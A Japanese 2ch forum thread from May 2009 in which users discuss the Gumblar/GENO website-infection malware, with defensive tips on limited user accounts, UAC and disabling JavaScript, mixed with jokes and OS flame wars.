商用ソフトで公式対応してりゃあ当然動くだろうけど
>>383 >>396
の理屈でいけば
公式対応してない商用ソフトで
いわゆる管理者権限がいるソフトは動かない確率高いのでは?

管理者権限がいるソフト
という時点でどういうソフトなのか俺には分からないが
誰か余裕があったら解説たのむ
415名無しさん@九周年:2009/05/17(日) 23:49:44 ID:AixvPechO
スレタイそんなに悪いのか!?まあうまくはないな
単にスレタイ(ウィルス、小林製薬)で来てみたんだが実は深刻なんだな
416名無しさん@九周年:2009/05/17(日) 23:51:38 ID:oSe49aWO0
>>414
今時業務で普通に使われるソフトで
公式対応してないのがないってこと

遅いところも顧客から対応迫られて
昨年度には対応してる
417名無しさん@九周年:2009/05/17(日) 23:53:03 ID:UQ+VQfUW0
自分が使ってるアンチウィルスソフトで弾けるか試して見たいけどいい方法ないかな。
418名無しさん@九周年:2009/05/17(日) 23:55:58 ID:ONbLLSKl0
>一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

とかいう話もある
419名無しさん@九周年:2009/05/17(日) 23:56:32 ID:IdREkqr/0
>>416
ただ、インストールはAdministratorでやらないとインスコできない
ものが多く、ユーザ権限のマシンでインストールができないのは、多い。

まぁ、多いって表現がおかしいんだけれどね。それが当たり前だし。

420名無しさん@九周年:2009/05/17(日) 23:58:18 ID:0KnEB8ZsO
いままで最強にいやだったウイルスはhikaruだ。
正確にはウイルスじゃないそうだが、俺から言わせればウイルスだ

あれは今でもトラウマ。
HDD壊れてもいいからあれに感染するのだけは勘弁

セキュリティソフトも
カスペ>>ノートン>>>>>>バスター
なのは十分分かっているが、この中でhikaruを検出するのが
バスターのみって理由だけでバスター使ってるくらいだ
421名無しさん@九周年:2009/05/18(月) 00:00:26 ID:mZFiRSaa0
>>419
まぁものによって必要なのは当たり前だね
ただ大半はPowerUsers権限でインストールできたりする

UNIX系もインストールはroot権限必要なんてのは
よくあるし当たり前のことでもあるね
422名無しさん@九周年:2009/05/18(月) 00:01:00 ID:kvzYuYiF0
あの余裕のある人がいたら
ぜひちょっと付き合って教えて欲しいのですが

上の>>383 >>396を見て俺なりに
・Vistaはアプリを一般権限でしか動かさない

・今回はAdobeの脆弱性、かつ発動に管理者権限が必要

だからVistaは助かったという理屈でOKですかね?
423名無しさん@九周年:2009/05/18(月) 00:01:32 ID:94fB6CqE0
まあ気を付けたほうがいいよ

外はインフル
中もウイルス
424名無しさん@九周年:2009/05/18(月) 00:02:02 ID:xx412Puj0
周知あげ

くだらん話題で埋もれていいスレじゃないんだよ
425名無しさん@九周年:2009/05/18(月) 00:02:46 ID:aCCosdg20
あげる
426名無しさん@九周年:2009/05/18(月) 00:05:22 ID:+Nl8O26l0
>>422
まぁ大まかには
それでいいんじゃないでしょうか
427名無しさん@九周年:2009/05/18(月) 00:08:40 ID:sTZ5SB9U0
これじゃどこも検索できねぇwww
428名無しさん@九周年:2009/05/18(月) 00:09:04 ID:8t5RAqZ80
>>424
無印には何日も前から、目立つようなスレタイでw継続スレが立ってるし
セキュ板にもスレ立ってるし、
これで見逃すような人はいくら宣伝リンク貼っても見に来ないと思う
429名無しさん@九周年:2009/05/18(月) 00:09:09 ID:GzROcZt10
>>420
処女じゃなかったんだよな
我が目を疑ったわ・・・・
430名無しさん@九周年:2009/05/18(月) 00:16:19 ID:kvzYuYiF0
>>426
あ、どうも
となるとついでにもう一つ聞いときたいのですが

>>375
>通常は制限ユーザーで仕事。
>これ最強

今回のウイルス限定という事でなく
そしてデータ管理は他の方法でしっかり行うとして
「仕事は制限ユーザーでログインして行う」
「その他は管理者権限で行う」
というのはある程度の意味というか
メリットありそうですかね?

というのは今回俺が一番気になってる点は
「ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集」
みたいな一文でして
「必要な場合だけ制限ユーザーでログインして入力」
という事にそれなりに意味があるなら
そうしてもいいかなあと思ってるのですが
431名無しさん@九周年:2009/05/18(月) 00:16:51 ID:Ka7sRz2z0

こういうの発生する度に思うんだが、Windowsのウイルス禍って
MSのいい加減さによる人災だよな。。。


432名無しさん@九周年:2009/05/18(月) 00:17:59 ID:8t5RAqZ80
>>430
http://pc11.2ch.net/test/read.cgi/internet/1242450264/

ココの人のほうが詳しいかも ↑
433名無しさん@九周年:2009/05/18(月) 00:18:49 ID:+Nl8O26l0
>>420
デイリー検出率ランキング
ttp://mtc.sri.com/live_data/av_rankings/

現在は
トレンド>シマンテック>カスペルスキ

ウィルス対策製品は抜きつ抜かれつ
日々競争ですよ
434名無しさん@九周年:2009/05/18(月) 00:19:11 ID:sTZ5SB9U0
ノートン先生覚醒ってマジ?
435名無しさん@九周年:2009/05/18(月) 00:19:17 ID:za3tpOBh0
見たけどカスペルスキーが検出した。
大したもんだと思った
436名無しさん@九周年:2009/05/18(月) 00:20:09 ID:kvzYuYiF0
>>432
おわっインターネットのGENOウイルススレ

ありがとうちょっとここも読んでみます
437名無しさん@九周年:2009/05/18(月) 00:20:24 ID:SZb+WUYw0
>>431
いい加減さというか、
ウィルス感染で失う客 < ウィルス対策で失う客
ってことだろ
このスレの伸びの悪さを見ると不等号の数を
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
くらいに増やしていいくらいだ
438名無しさん@九周年:2009/05/18(月) 00:21:09 ID:szIhA0dy0
どんだけ検出率高くても一つ見逃せば終わるんじゃね?
439名無しさん@九周年:2009/05/18(月) 00:22:24 ID:+Nl8O26l0
>>430
メリットあるよ

ちなみにその他じゃなくて、すべて制限ユーザで行って
その中で管理者権限が必要なところがでてきたら、
管理者ユーザとして実行すれば良い
別のユーザとして実行ってメニューがあるから
440名無しさん@九周年:2009/05/18(月) 00:23:45 ID:dn+zrrJJ0
まなみです!
  みのりです!
    りさです!

3人そろって、まなみのりさです!
441名無しさん@九周年:2009/05/18(月) 00:23:55 ID:wAuLFu7rO
>>157>>186です
結局アンチウイルスのアップデートは2/3で弾く
ニフティセキュリティはページ進行を遮るで
現在リカバリ中

しかし出張中しかつかわないから
Web見たのはGW前になるんだがな
それともメール感染するの?
442名無しさん@九周年:2009/05/18(月) 00:24:38 ID:0+vZnjqfO
反日企業
443名無しさん@九周年:2009/05/18(月) 00:25:07 ID:SZb+WUYw0
Windowsの制限ユーザでハマったのはSteamのゲームくらいだな
初回起動時にレジストリいじったりDRM入れたりするゲームが時々ある
やってる事はウィルスと変わらんわけで
444名無しさん@九周年:2009/05/18(月) 00:25:07 ID:kvzYuYiF0
>>439
あー本当だ「別のユーザとして実行」って出てる
気にした事もなかった

ありがとう
ちょっと自分でもググりつつ
そのような運用を構築してみます
445名無しさん@九周年:2009/05/18(月) 00:25:41 ID:D9B1P/MPO
>>433
へー、バスターやるなあ。。。。


っておい!誤検出ランキングじゃねえかよ
446名無しさん@九周年:2009/05/18(月) 00:25:43 ID:6wmHQpZRO
一方俺のNOD32は
447名無しさん@九周年:2009/05/18(月) 00:26:16 ID:sTZ5SB9U0
>>445
www

生きろwww
448名無しさん@九周年:2009/05/18(月) 00:27:23 ID:n3NZ7CVwO
ある意味豚インフルよりニュースで詳しくとりあげてほしい
449名無しさん@九周年:2009/05/18(月) 00:27:36 ID:7VHV0ed10


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。


450名無しさん@九周年:2009/05/18(月) 00:27:55 ID:Q8SIkBp/0
あら、こんな事が起こってたのか…
感染してなさそうなことは確認できたが、ただ単に運が良かっただけみたいだな。

これ知らないで、のほほんとしてる人、凄いいっぱいいそうだね。
451名無しさん@九周年:2009/05/18(月) 00:29:29 ID:sTZ5SB9U0
とりあえずしりあいに警告はした

あとはあっちが気をつけてくれりゃな
452名無しさん@九周年:2009/05/18(月) 00:30:26 ID:SZb+WUYw0
・知らないでのほほんとしている人
・ガクガクブルブルするばかりの人
・一銭にもならないのに一人でも多く救おうとする人
・感染の心配が無いので他人の不幸を見物に来てる人
・この機に乗じてFUDを撒き散らす人
453名無しさん@九周年:2009/05/18(月) 00:34:01 ID:+Nl8O26l0
>>445
検出率というと語弊があったか
検知力って書いてたから検知力でいいか
まぁtrue positiveが高いんだから性能としてはいいでしょう?
454名無しさん@九周年:2009/05/18(月) 00:36:08 ID:KW5lepf/0
下から2番目のやつ多そうだなw
でもあまりメシウマにはならないと思うが・・・
455名無しさん@九周年:2009/05/18(月) 00:36:34 ID:R8V+0mK80
小さな町の中古車屋のサイトが改ざんされたらしくmartuz.cnから読み込んでますとか出てびっくりした
456名無しさん@九周年:2009/05/18(月) 00:36:38 ID:Pj6DQvPa0
これドラゴンボールで例えるとどれぐらい危険?
457名無しさん@九周年:2009/05/18(月) 00:37:05 ID:ONCo3wbv0

>>431
MS「セキュリティ対策はユーザーの義務です!」キリッ

↑そういうセリフはまともなOS作ってから言えやw


458名無しさん@九周年:2009/05/18(月) 00:37:12 ID:dUxSYFtm0
あさりたくさんもらって困ったから
保存の仕方や、いろんなレシピ探すのに
おもいきりググりまくったじゃないか・・  
459名無しさん@九周年:2009/05/18(月) 00:37:15 ID:w4iQiRAM0
初めてVistaのUACが役に立ちそうだ。
460名無しさん@九周年:2009/05/18(月) 00:37:54 ID:9v4hxk8l0
>>431
それどころかウイルスはMSが作っ おいおいおい なにすんだよ こら
461名無しさん@九周年:2009/05/18(月) 00:39:27 ID:rTVMMl4QP
こういうのだとほっとしないか?
http://up2.viploader.net/pic/src/viploader1020375.gif
462名無しさん@九周年:2009/05/18(月) 00:40:18 ID:8GCupcsBO
>>456
たいしたことねーよ。
ヤムチャの狼牙風風拳ぐらい
463名無しさん@九周年:2009/05/18(月) 00:40:28 ID:+Nl8O26l0
>>461
やべ、実行された
464名無しさん@九周年:2009/05/18(月) 00:40:31 ID:SZb+WUYw0
MSにもAppleにもLinux陣営にもウィルス作る動機があって
もう誰が作ったやら見当もつかない
Sunをクビになった技術者が腹立ちまぎれに作った可能性だってある
465名無しさん@九周年:2009/05/18(月) 00:40:36 ID:kvzYuYiF0
なるほどなるほど
一度リストアしてすっきりした上で
新しく管理者ユーザを作成して
今のユーザーを制限ユーザにすれば
いいっぽいわけか

すぐやらねば
役に立つスレでとても助かります
466名無しさん@九周年:2009/05/18(月) 00:42:38 ID:Pj6DQvPa0
>>462
ヤムチャレベルか、安心しますた。d
467名無しさん@九周年:2009/05/18(月) 00:44:00 ID:ROF5PWY90
フリーザレベルじゃね?
468名無しさん@九周年:2009/05/18(月) 00:44:09 ID:wAuLFu7rO
リストア終了
データほとんどないかららくだし、メインは被害なし
ただ朝会社のpcチェックが恐怖
469名無しさん@九周年:2009/05/18(月) 00:44:46 ID:FsZsqvLo0
これってPDFリーダーをアドビから変えれば防げる?
470名無しさん@九周年:2009/05/18(月) 00:44:57 ID:wt9JpuYH0
>>460
MSは作ってないだろうが、ヴィルス対策ソフト作ってる会社は
こっそり作ってるだろうな。
471名無しさん@九周年:2009/05/18(月) 00:46:10 ID:YQidG4Bl0
84→92→
472名無しさん@九周年:2009/05/18(月) 00:46:11 ID:Pj6DQvPa0
>>467
えー、レベルが違いすぎる・・・
本当はどっちですか?
473名無しさん@九周年:2009/05/18(月) 00:47:22 ID:8t5RAqZ80

50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。

162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。

204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。
日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?

995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。

144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ

940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように

このスレに気づかずに管理人に連絡とったのが悔やまれる
474名無しさん@九周年:2009/05/18(月) 00:49:06 ID:NtvKYyUB0
これってさ小林製薬の中の人が勤務中に会社のPCで同人サイト閲覧して感染しその感染PCでサイト更新したってこと?
475名無しさん@九周年:2009/05/18(月) 00:49:39 ID:qxEaJ2lJ0
>>473
そいつリアルタイムで見てたわ
願いが叶ったなw
476名無しさん@九周年:2009/05/18(月) 00:50:12 ID:SZb+WUYw0
>>474
同人サイトかどうかは知らないが、他は概ねそのとおり
もしかすると特殊清掃系サイトだったかもしれない
477名無しさん@九周年:2009/05/18(月) 00:50:58 ID:ROF5PWY90
>>472
少なくともヤムチャではないと思うが。
ヤムチャがアンチウイルスソフト(クリリン〜ベジータレベル)の攻撃を
残らず避けて来れると思うのか?
478名無しさん@九周年:2009/05/18(月) 00:52:11 ID:szIhA0dy0
知らずに勤務中に見ててやっちゃったら人生狂いそうだな
479名無しさん@九周年:2009/05/18(月) 00:52:19 ID:wt9JpuYH0
>>473
何のzip落としてたんだろう。
ていうか、不器用なやつだなぁ。
480名無しさん@九周年:2009/05/18(月) 00:52:20 ID:JyZDEwl10
つか同人界隈しか広がってないように聞こえるけど

実際は出版だのゲーム屋だの楽天のショップだの酷いことになってるから
一概にどこで拾ったとは言えない気がする
481名無しさん@九周年:2009/05/18(月) 00:52:36 ID:tg2qzOVl0
>>473

Windowsでネットしてると、人生を強制終了させられるのなw


482名無しさん@九周年:2009/05/18(月) 00:52:49 ID:Pj6DQvPa0
>>477
かなり危なそうですね。
今のところ大丈夫みたいですが、これからも気をつけます。
アリガトン
483名無しさん@九周年:2009/05/18(月) 00:54:07 ID:ROF5PWY90
>>480
楽天アウトなの?
マジで?
484名無しさん@九周年:2009/05/18(月) 00:54:15 ID:m0xq4wJt0
これ感染してる人いっぱいいそうだな
485名無しさん@九周年:2009/05/18(月) 00:54:29 ID:8t5RAqZ80
>>479
感染していたGENOサイトへの偽装リンクを、なぜかZIPだと思ってw踏んだらしい

いちばんタチ悪いのは、こうやってわざと感染サイトを踏ませようとするやつが出てくることかもな
486名無しさん@九周年:2009/05/18(月) 00:55:01 ID:JyZDEwl10
>>483
全部じゃねえぞw
487名無しさん@九周年:2009/05/18(月) 00:55:15 ID:JsxzVHLzO
>>480
同人サイトは管理人同士が見る確率高いから広まりやすいってだけだ
488名無しさん@九周年:2009/05/18(月) 00:55:30 ID:0dM9T0YB0
アンチウイルスに頼ってる人は遅かれ早かれ感染するぞ
マヂな話アンチウイルスの更新は現状のウイルスに対してもはや手遅れ状態
新型やその亜種の初期感染を防ぐ事はほぼ不可能になっている
ウイルス犯罪者の更新が早すぎて亜種の判別と対策に追いつていないのだよ
有志の検体提出を受けて対応を取ってもすぐに亜種が作成されてしまう
イタチごっこが今のネットウイルスの実情
根本的にウイルスに感染しない、もしくは感染しても被害が及ばないような対策を取るしかないのだよ
489名無しさん@九周年:2009/05/18(月) 00:56:25 ID:NtvKYyUB0
出版社とか新聞社とか感染しまくってそう
490名無しさん@九周年:2009/05/18(月) 00:56:49 ID:SZb+WUYw0
今後の影響としては本屋でのエロ本の売上が伸びそうだな
491名無しさん@九周年:2009/05/18(月) 00:58:53 ID:BK5ZgyO20
またAdobe Flash Playerかよ
廃止しろ廃止
492名無しさん@九周年:2009/05/18(月) 00:59:14 ID:szIhA0dy0
定石として一番得する者が犯・・・ゲフンゲフン
493名無しさん@九周年:2009/05/18(月) 01:00:48 ID:8t5RAqZ80
>>489
クルッポーのサイトとか今感染したら、凄いことになりそうな気がするw
494名無しさん@九周年:2009/05/18(月) 01:01:59 ID:Db+wm8380
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
495名無しさん@九周年:2009/05/18(月) 01:02:16 ID:ip69f8aU0
>>492
新アンチウイルスソフト、「ネットバーロー」とか作らにゃあかんな。
496名無しさん@九周年:2009/05/18(月) 01:02:55 ID:zXaMPVf40
>>491
そういや前にXREAの広告改竄された時もFlashだったな・・・
497名無しさん@九周年:2009/05/18(月) 01:04:44 ID:JyZDEwl10
>>494
GENOのあのコメントは唖然としたわ
498名無しさん@九周年:2009/05/18(月) 01:07:18 ID:w4iQiRAM0
VistaとSilverlightを普及させるためn…おや?誰か来たようだ。ちょっと玄関に行ってくるノシ
499名無しさん@九周年:2009/05/18(月) 01:08:38 ID:WHmx7NF+0
なんでこの週末になって GENO ウイルス(gumblar.cn)が話題になっているの?
自分が初めて知ったのは5/7だったが、それから1週間ぐらい経って亜種が出てきてウイルスソフトの対策より
広まったの?
500名無しさん@九周年:2009/05/18(月) 01:09:50 ID:9rMJSJDh0
>>499
一件マトモな企業HPまで感染し始めたから
501名無しさん@九周年:2009/05/18(月) 01:10:17 ID:Yl/BMCl/O
サイト閲覧でもインフルエンザ感染すんの?
パソコンまじコワス
502名無しさん@九周年:2009/05/18(月) 01:13:09 ID:JyZDEwl10
2次元でも3次元でもパンデミックでござる の巻
503名無しさん@九周年:2009/05/18(月) 01:15:06 ID:lCqkMYY8O
リアルでもネットでもウイルス祭り…、安息の地は何処にあるんだ
504名無しさん@九周年:2009/05/18(月) 01:15:33 ID:zXaMPVf40
今思ったんだが、これAdobeのサイトが改ざんされたら悲惨なことにならないか?
505名無しさん@九周年:2009/05/18(月) 01:16:15 ID:9rMJSJDh0
>>504
海外じゃとっくにAdobeそっくりのトロイダウンロードサイトが出来てる
506名無しさん@九周年:2009/05/18(月) 01:17:27 ID:e9GYS1ZLO
取りあえず暫くはPCからサイトは見ないようにするわ
507名無しさん@九周年:2009/05/18(月) 01:18:39 ID:Rjnp/DgnO
恥を忍んで聞くけどadobeって何て読むの?
アドベ?アドーブ?
508名無しさん@九周年:2009/05/18(月) 01:19:27 ID:JyZDEwl10
adobe社はアドビと主張しています
509名無しさん@九周年:2009/05/18(月) 01:22:20 ID:Rjnp/DgnO
>>508
ごめんググったら一番に出てきたわ
ありがとう
あなたにとって今日が幸せでありますように
510名無しさん@九周年:2009/05/18(月) 01:22:31 ID:tg2qzOVl0
まじでマックに乗り換えといて大正解だったわ
511名無しさん@九周年:2009/05/18(月) 01:25:43 ID:iXdAJX0r0
いまだ古いOSを使っとるよ
ネットするらなこれくらいで充分・・・
512名無しさん@九周年:2009/05/18(月) 01:26:09 ID:Rjnp/DgnO
海外の人は読めない名前とかどうやって読んでんだろうな
カタカナとかローマ字とかないだろうし
513名無しさん@九周年:2009/05/18(月) 01:27:31 ID:Yl/BMCl/O
マックOS9まじお薦め
514名無しさん@九周年:2009/05/18(月) 01:27:39 ID:iOT/PuHr0
>>511
まあ確実にウイルスばらまいてるだろうな。

あと本当にみてるだけならまだ大丈夫だけど
ネットショッピングとかしてるとアウトだしメールものぞかれててもおかしくないって忠告はしとく。
515名無しさん@九周年:2009/05/18(月) 01:27:46 ID:SZb+WUYw0
>>512
辞書を引く
516名無しさん@九周年:2009/05/18(月) 01:30:10 ID:D9B1P/MPO
ワクチンをすべてのセキュリティソフトで共有できるようにすればいいのに
517名無しさん@九周年:2009/05/18(月) 01:31:49 ID:lgOZquPl0
オレもアップルのMacOS X使ってるからウィルスとか無縁。
518名無しさん@九周年:2009/05/18(月) 01:33:05 ID:JyZDEwl10
思わずネットは広大だわとか言いたくなる
519名無しさん@九周年:2009/05/18(月) 01:33:36 ID:SZb+WUYw0
いいかげんにしろ
マカがうざすぎ
アボーン出来ないようにわざと毎回ID変えてやがるし
死んじまえマジで
520名無しさん@九周年:2009/05/18(月) 01:33:38 ID:rM+f+K3bO
>>513
今まさに、PS6を使うために起動中だわw
軽くていい。
521名無しさん@九周年:2009/05/18(月) 01:34:38 ID:s4AoIWmlO
昨日調べまくって一日が終わって感染はしてなかったが
当分携帯厨にジョブチェンジ(´・ω・`)b
522名無しさん@九周年:2009/05/18(月) 01:37:47 ID:D9B1P/MPO
>>521
もう対策パッチでてるから そんな身構えなくていいよ
523名無しさん@九周年:2009/05/18(月) 01:42:43 ID:JBP3jkL1O
マスクしてれば感染しない。
524名無しさん@九周年:2009/05/18(月) 01:46:01 ID:JZXmgbts0
GENOウイルスの亜種か?
525名無しさん@九周年:2009/05/18(月) 01:46:30 ID:rTVMMl4QP
おまえらjavaやFlash使いまくりのサイト閲覧しててGENOウィルスは知ってるんだろうな?
史上最強最悪のウィルスが大企業や役所のサイトまで汚染してるんだぜ?
楽天内の某ショップや、普通の通販サイトも感染している。
単にそのサイトを見ただけで感染してしまう。
セキュリティソフトはどれも対応していない(avast!のみ警告あり)
感染したが最後、セキュリティシステムはボロボロにされるわ、
トロイやスパイウェアをテンコ盛りでインスコされるんだぞ。
新型インフルエンザなんてメじゃないほどの大流行。
「しばらくはPCやめて携帯でネットするわ」とか、
「明日は会社で1日かけて対策が必要だあ..orz」とか、
実態を知った人の間ではパニック状態になっている。

実態を知らなければ平和かって?
クレカ情報からアドレス帳、パスワード類が流出しまくっても平和と言えるならな。

【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/
526名無しさん@九周年:2009/05/18(月) 01:46:47 ID:SiSez5CI0
やっちまった(´・ω・`)
新型インフル関連スレにあるリンクを踏んだのが原因っぽい
DOS窓開かない、regedit開かない、Yahoo開かない
HDDのランプが不自然に点滅....
もうダメだ
527名無しさん@九周年:2009/05/18(月) 01:50:30 ID:D9B1P/MPO
>>526
早く保健所に電話するんだ
528名無しさん@九周年:2009/05/18(月) 02:00:22 ID:mC8ldwIH0
             _,,..r'''""~~`''ー-.、 
            ,,.r,:-‐'''"""~~`ヽ、:;:;:\ 
           r"r          ゝ、:;:ヽ 
   r‐-、   ,...,, |;;;;|       ,,.-‐-:、 ヾ;:;ゝ 
   :i!  i!  |: : i! ヾ| r'"~~` :;: ::;",,-‐‐-  `r'^! 
    !  i!.  |  ;| l|  ''"~~   、      i' | 
     i! ヽ |  | |    ,.:'"   、ヽ、   !,ノ 
    ゝ  `-!  :| i!  .:;: '~~ー~~'" ゙ヾ : : ::| 
   r'"~`ヾ、   i! i!   ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、XP房見てるー? 
  ,.ゝ、  r'""`ヽ、i! `:、   ー - '" :: : :/ ,/ 
  !、  `ヽ、ー、   ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'" 
   | \ i:" )     |   ~`'''ー---―''"~ 
   ヽ `'"     ノ 

529名無しさん@九周年:2009/05/18(月) 02:02:17 ID:p4uP1YaM0
GENOの謝罪キタ━━━━━(゚∀゚)━━━━━ !!!!!
530名無しさん@九周年:2009/05/18(月) 02:03:47 ID:GA20Mmo70
よく分からないんだけどこれ、ノートンではまだ対応してないんだよね?
執筆の仕事でPC使ってるから、かなり怖い。
しばらくネットつながないで頑張るか。
531名無しさん@九周年:2009/05/18(月) 02:03:50 ID:kvzYuYiF0
しかしうかうか検索もできんな
ヤムチャってそんなに弱かったか
検索したいんだが
532名無しさん@九周年:2009/05/18(月) 02:04:04 ID:iXdAJX0r0
>>514
そろそろ使って十年になるけど何もない
メール開いてない
ネットショッピングは年にするかしないか
2chは専ブラ

トホホホ
533名無しさん@九周年:2009/05/18(月) 02:05:21 ID:SMVhgMVT0
>>531
javascript java ActiveX この辺りoffにしてブラウズしてりゃ平気じゃね?
534名無しさん@九周年:2009/05/18(月) 02:06:11 ID:Yu3gbRlRO
俺がGENOだああああああああああああああ!!!!!!!!!
535名無しさん@九周年:2009/05/18(月) 02:08:05 ID:iXdAJX0r0
心配なのは会社のPC
536名無しさん@九周年:2009/05/18(月) 02:09:39 ID:SMVhgMVT0
ネットショッピングしてるとjavascript onにさせられるしなぁw
537名無しさん@九周年:2009/05/18(月) 02:09:46 ID:HJx3goAd0
java scriptのoffの仕方教えてくれんか
538名無しさん@九周年:2009/05/18(月) 02:10:35 ID:VQE/uPEU0
C:\WINDOWS\system32\sqlsodbc.chm

を検索かけたら見つからないんだけど…(((( ;゚Д゚)))ガクガクブルブル
539名無しさん@九周年:2009/05/18(月) 02:13:17 ID:fMmOr3Q+0
>>538
C:\Windows\Help\mui\0411
C:\Windows\Help\mui\0409
のどっちかにあるはず

とりあえず容量ちがったら死亡
540名無しさん@九周年:2009/05/18(月) 02:13:22 ID:SMVhgMVT0
>>537
JavaScriptのON/OFF
http://www.pori2.net/js/kihon/1.html

ぐぐって一発目のサイトだがこれでいけそう
541名無しさん@九周年:2009/05/18(月) 02:13:32 ID:D9B1P/MPO
>>530
駆除できないってだけで、検出はほとんどが対策済み。
セキュリティソフト持ってないなら AdobeReaderのスクリプトをオフにすればいい
542名無しさん@九周年:2009/05/18(月) 02:15:50 ID:+kO54pjp0
>>538
OSはなに?
543名無しさん@九周年:2009/05/18(月) 02:20:51 ID:HJx3goAd0
>>540
ありがとう
できました

びびりすぎてググることもせずに聞いてしまって申し訳ない
でも助かりました

>>542
心配掛けてすみません
オフにできました
544名無しさん@九周年:2009/05/18(月) 02:22:08 ID:SMVhgMVT0
アドビのスクリプトもオフにせなあかんのやな

Adobe Reader 9.x の Java Script を無効化する方法
http://blogs.wankuma.com/tyappi/archive/2009/03/15/169723.aspx
545名無しさん@九周年:2009/05/18(月) 02:23:26 ID:HJx3goAd0
>>542
安価先自分じゃなかった・・・w
焦りすぎですね俺・・・
546名無しさん@九周年:2009/05/18(月) 02:25:10 ID:fMmOr3Q+0
>>545
餅搗いてコーヒー飲めw

焦ると失敗しまくるぞ・・・ orz
547名無しさん@九周年:2009/05/18(月) 02:31:26 ID:Us0me7Qt0
MacOS8,6で何か気をつけることはありますか?
548名無しさん@九周年:2009/05/18(月) 02:33:19 ID:JyZDEwl10
マカーは大丈夫
549名無しさん@九周年:2009/05/18(月) 02:48:26 ID:Qgkp/Oav0
VISTAなんだけどUAC切ってたら意味ない?
550名無しさん@九周年:2009/05/18(月) 02:50:54 ID:JyZDEwl10
意味無い
551名無しさん@九周年:2009/05/18(月) 02:53:52 ID:znTEna2j0
フラッシュってアドビじゃなくてマクロメディアだろjk的
552名無しさん@九周年:2009/05/18(月) 02:55:11 ID:JyZDEwl10
4年前に合併してんだろ
553名無しさん@九周年:2009/05/18(月) 02:55:24 ID:x7emLR5i0
インフルAもやばいがこのウイルスもやべーな
554名無しさん@九周年:2009/05/18(月) 02:55:56 ID:B4ZbpLD60
>>551
資本持ってる奴には勝てないんよ・・・・(´;ω;`)
555名無しさん@九周年:2009/05/18(月) 02:58:29 ID:PR0dYXMi0
初めてVISTAでよかったと思ったw
556名無しさん@九周年:2009/05/18(月) 03:03:51 ID:YU/+o/UZ0
今見てきたけど、別に何もなかったよ。
Googleデスクトップ使用の、WindowsXP-SP3 +IE8 +ファイアーフォックス使い。

http://www.kobayashi.co.jp/

なんちゃってVistaと人からは酷評浴びてる。
557名無しさん@九周年:2009/05/18(月) 03:04:29 ID:NzfU4us3O
製薬会社だからウイルスか…。
558名無しさん@九周年:2009/05/18(月) 03:06:27 ID:x7emLR5i0
>>556
そりゃ公表した時点で改竄されてるところは閉鎖してるだろ
しかもwww.kobayashi.co.jpはもとから改ざんされてないし
559名無しさん@九周年:2009/05/18(月) 03:06:56 ID:lpEb2aip0
マスク紹介のページとかだったら、
頭いいなこれw

560名無しさん@九周年:2009/05/18(月) 03:08:00 ID:YU/+o/UZ0
自分の使ってるhpのノートPCは最初の初期設定ではアドビはOff。
タブをクリックしないと起動できない設定。もちろん起動は可能。

Googleはさすがに凄いな。

だから別に何も起きないわけだが。
561名無しさん@九周年:2009/05/18(月) 03:10:56 ID:YU/+o/UZ0
>>558
昔のHDクラッシュ・タイプに比べれば軽いと思うよ。
要は、IEも切りアドビも切って日本語ソフトもOff。これで問題ないだろ。w
562名無しさん@九周年:2009/05/18(月) 03:30:11 ID:afyspx4O0
VistaのUAC最強だなw
563名無しさん@九周年:2009/05/18(月) 03:31:46 ID:riS8aAMS0
これって Adobe 突っつくアレか
564名無しさん@九周年:2009/05/18(月) 03:47:19 ID:LP7zoo+i0
出社したやつらが何も知らずに繋いで阿鼻叫喚の図が
565名無しさん@九周年:2009/05/18(月) 04:06:23 ID:cCrj5zGyO
AdobeReaderアンインスコしてる俺に隙はなかった
566名無しさん@九周年:2009/05/18(月) 05:34:23 ID:sgJRF4KF0
続々発生しているらしい亜種たちがこわいお
567名無しさん@九周年:2009/05/18(月) 05:42:45 ID:xFQPYwft0

USBメモリで感染するウイルスもそうだけど、こういう明らかにWindowsの構造
自体が原因になってるウイルス被害ってMSに賠償請求できないの?


568名無しさん@九周年:2009/05/18(月) 05:46:15 ID:fm8olzq9O
>>567
だったらMacかLinux使ってね(はぁと

で終了。
569名無しさん@九周年:2009/05/18(月) 05:47:05 ID:p5o/xPAw0
